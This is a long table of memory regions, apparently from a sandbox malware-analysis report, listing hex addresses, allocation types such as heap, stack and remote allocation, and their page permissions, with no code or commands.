236A0000
trusted library allocation
page read and write
24200000
trusted library allocation
page read and write
58B7000
heap
page read and write
5A80000
heap
page read and write
21608000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
236A0000
trusted library allocation
page read and write
24150000
trusted library allocation
page read and write
21484000
heap
page read and write
21320000
trusted library allocation
page read and write
2370D000
stack
page read and write
23750000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
4DD7000
trusted library allocation
page read and write
215AA000
trusted library allocation
page read and write
216BC000
trusted library allocation
page read and write
91F000
stack
page read and write
2275C000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
225F1000
trusted library allocation
page read and write
23760000
trusted library allocation
page read and write
210EF000
stack
page read and write
217E8000
trusted library allocation
page read and write
7B0000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
45BE000
stack
page read and write
23A90000
trusted library allocation
page read and write
23760000
trusted library allocation
page read and write
21110000
direct allocation
page read and write
227CE000
trusted library allocation
page read and write
6EA5000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
23760000
trusted library allocation
page read and write
7E2000
trusted library allocation
page read and write
236B6000
trusted library allocation
page read and write
23A90000
trusted library allocation
page read and write
22633000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
242E0000
trusted library allocation
page read and write
227E9000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
216B4000
trusted library allocation
page read and write
460000
heap
page read and write
23760000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
807000
heap
page read and write
23750000
trusted library allocation
page read and write
6BFF000
stack
page read and write
70A0000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
22885000
trusted library allocation
page read and write
23AA0000
trusted library allocation
page execute and read and write
23750000
trusted library allocation
page read and write
3E56000
remote allocation
page execute and read and write
23750000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
24290000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
6F1E000
stack
page read and write
407000
unkown
page readonly
225DC000
trusted library allocation
page read and write
21575000
trusted library allocation
page read and write
23A90000
trusted library allocation
page read and write
4691000
trusted library allocation
page read and write
24150000
trusted library allocation
page read and write
6720000
direct allocation
page read and write
7DA000
trusted library allocation
page execute and read and write
236B0000
trusted library allocation
page read and write
5814000
heap
page read and write
2261B000
trusted library allocation
page read and write
242B0000
trusted library allocation
page read and write
888E000
stack
page read and write
2377A000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
224E000
stack
page read and write
7080000
trusted library allocation
page read and write
24200000
trusted library allocation
page read and write
88D0000
trusted library allocation
page execute and read and write
23770000
trusted library allocation
page read and write
227BF000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
2740000
heap
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
236A0000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
6750000
direct allocation
page read and write
2287F000
trusted library allocation
page read and write
22643000
trusted library allocation
page read and write
214E0000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
6770000
direct allocation
page read and write
240DE000
stack
page read and write
24140000
trusted library allocation
page read and write
2730000
heap
page read and write
24150000
trusted library allocation
page read and write
61E000
stack
page read and write
235A0000
trusted library allocation
page read and write
235D8000
heap
page read and write
24140000
trusted library allocation
page read and write
24150000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
226B3000
trusted library allocation
page read and write
213AE000
trusted library allocation
page read and write
8250000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
20940000
direct allocation
page read and write
89E6000
direct allocation
page execute and read and write
236B0000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
7F4F8000
trusted library allocation
page execute and read and write
24140000
trusted library allocation
page read and write
24150000
trusted library allocation
page read and write
236A0000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
219E9000
trusted library allocation
page read and write
6790000
direct allocation
page read and write
24265000
trusted library allocation
page read and write
216F2000
trusted library allocation
page read and write
24290000
trusted library allocation
page read and write
24200000
trusted library allocation
page read and write
216A0000
trusted library allocation
page read and write
218A6000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
7F13000
heap
page read and write
870000
trusted library allocation
page execute and read and write
22842000
trusted library allocation
page read and write
58A0000
direct allocation
page read and write
24140000
trusted library allocation
page read and write
242B0000
trusted library allocation
page read and write
2A90000
trusted library allocation
page read and write
20980000
direct allocation
page read and write
23750000
trusted library allocation
page read and write
2270000
heap
page read and write
23A90000
trusted library allocation
page read and write
4856000
remote allocation
page execute and read and write
24140000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
2262A000
trusted library allocation
page read and write
7B4000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24200000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
810000
trusted library allocation
page read and write
227B1000
trusted library allocation
page read and write
466000
heap
page read and write
23750000
trusted library allocation
page read and write
3160000
heap
page read and write
242A0000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
80C0000
trusted library allocation
page execute and read and write
23750000
trusted library allocation
page read and write
24200000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24150000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
2ABB000
trusted library allocation
page execute and read and write
24140000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
5813000
heap
page read and write
24140000
trusted library allocation
page read and write
24180000
trusted library allocation
page read and write
21330000
heap
page read and write
23760000
trusted library allocation
page read and write
23A9D000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
236A0000
trusted library allocation
page read and write
5710000
heap
page read and write
23A90000
trusted library allocation
page read and write
4539000
heap
page read and write
725000
heap
page read and write
6A7000
heap
page read and write
721000
heap
page read and write
24120000
trusted library allocation
page read and write
32AF000
stack
page read and write
24200000
trusted library allocation
page read and write
2286A000
trusted library allocation
page read and write
860000
heap
page readonly
20F7F000
stack
page read and write
24150000
trusted library allocation
page read and write
7F22000
heap
page read and write
23750000
trusted library allocation
page read and write
6780000
direct allocation
page read and write
7F74000
heap
page read and write
24200000
trusted library allocation
page read and write
214E0000
trusted library allocation
page read and write
8260000
heap
page read and write
24140000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24180000
trusted library allocation
page read and write
215B2000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
1CD000
stack
page read and write
2411E000
stack
page read and write
628000
heap
page read and write
24150000
trusted library allocation
page read and write
407000
unkown
page readonly
24280000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
216B6000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
22787000
trusted library allocation
page read and write
23A90000
trusted library allocation
page read and write
7020000
trusted library allocation
page read and write
226EF000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
5A50000
direct allocation
page read and write
24120000
trusted library allocation
page read and write
211DE000
stack
page read and write
21902000
trusted library allocation
page read and write
20950000
direct allocation
page read and write
6FA000
heap
page read and write
24150000
trusted library allocation
page read and write
22883000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
2177A000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
20970000
direct allocation
page read and write
24200000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24180000
trusted library allocation
page read and write
228A4000
trusted library allocation
page read and write
236A0000
trusted library allocation
page read and write
24180000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24200000
trusted library allocation
page read and write
2AB7000
trusted library allocation
page execute and read and write
22791000
trusted library allocation
page read and write
23751000
trusted library allocation
page read and write
2374E000
stack
page read and write
22567000
trusted library allocation
page read and write
26FF000
stack
page read and write
24140000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
457F000
stack
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24180000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
56FB000
trusted library allocation
page read and write
5691000
trusted library allocation
page read and write
24290000
trusted library allocation
page read and write
21070000
remote allocation
page read and write
24200000
trusted library allocation
page read and write
2414F000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
226B5000
trusted library allocation
page read and write
24270000
trusted library allocation
page read and write
2A9D000
trusted library allocation
page execute and read and write
225E8000
trusted library allocation
page read and write
7000000
trusted library allocation
page read and write
225E3000
trusted library allocation
page read and write
3D60000
remote allocation
page execute and read and write
6E20000
trusted library allocation
page read and write
23A90000
trusted library allocation
page read and write
20DFD000
stack
page read and write
7BD000
trusted library allocation
page execute and read and write
242B0000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
21567000
trusted library allocation
page read and write
215AE000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24200000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24150000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
7010000
trusted library allocation
page read and write
24150000
trusted library allocation
page read and write
23770000
trusted library allocation
page read and write
20FCE000
stack
page read and write
24140000
trusted library allocation
page read and write
1C8000
stack
page read and write
23750000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
226E3000
trusted library allocation
page read and write
7B3D000
stack
page read and write
23750000
trusted library allocation
page read and write
2390E000
stack
page read and write
57DF000
heap
page read and write
C5E000
stack
page read and write
239CE000
stack
page read and write
6B4000
heap
page read and write
23750000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
There are 966 hidden memdumps, click here to show them.